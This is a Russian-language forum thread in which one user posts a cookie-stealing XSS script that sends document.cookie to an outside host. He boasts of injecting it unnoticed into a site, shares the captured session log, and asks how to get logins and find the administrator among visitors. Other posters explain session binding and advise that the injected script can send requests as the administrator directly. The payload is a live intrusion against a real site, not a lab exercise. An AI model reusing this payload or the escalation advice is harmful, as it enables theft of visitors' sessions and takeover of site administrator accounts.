Короче вот код <script>img = new Image(); img.src = "http://na-s.ru/images/########.gif?"+document.cookie;</script> Я его вставил!! и внедрил !! Админ его не спалил!! точно знаю !! вот что мне выдает !!! IP адрес : #####; Хост : ######; Дата : 05:29:56-01.02.09 Браузер : Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1 Удаленный порт : 59393; Тип соединения : close Откуда пришёл : ########### Строка запроса : PHPSESSID=932d484ac6c95ba2da6f892e42783f8d popup1=podderzhka_saita advmaker_pop=1 popup2=podderzhka_saita s=1 b=b hotlog=1 #### это мои замены!!! гдеже куки???7
А разве он когда пароль и логин вводит оно не должно мне показать??? И еще вопрос как из посетителей !! если их 30 000 админа найти??
Да даже если так то в "нормальном" виде тебе нечего непридёт. А только сессия которую он открыл.И помни "куки" не живут.
Ну вот смотри...Админ пришёл....пасидел...сессия открылась...админ ушёл...сессия осталась...в след. раз админ пришёл...сессия др будет... p.s.даже такой пример.
Не живут на чужом. то есть в сессии идет привязка к браузеру и ip-адресу посетителя. то есть тупо копировать-вставить ничего не даст.
magnatan, если ты можешь вставлять произвольный код, куки ни к чему - можно и так отправить все нужные запросы от имени админа (если он, конечно, будет авторизован)